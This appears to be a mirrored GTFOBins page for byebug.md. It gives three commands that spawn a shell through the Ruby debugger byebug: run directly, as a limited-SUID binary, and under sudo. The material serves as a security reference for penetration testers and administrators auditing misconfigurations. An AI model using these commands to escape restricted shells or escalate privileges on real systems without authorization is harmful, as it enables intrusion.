This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-21 02:55:16 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
1894142c8a9b03e33a81c5f99e5868e577dd73c0
GTFOBins.github.io
/
_gtfobins
/
byebug.md
bcoles
efb956a7b1
Create byebug.md
2020-03-17 20:12:46 +01:00
389 B
Raw
Blame
History
functions
functions
shell
limited-suid
sudo
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF byebug $TF continue
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF ./byebug $TF continue
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF sudo byebug $TF continue
Reference in New Issue
View Git Blame
Copy Permalink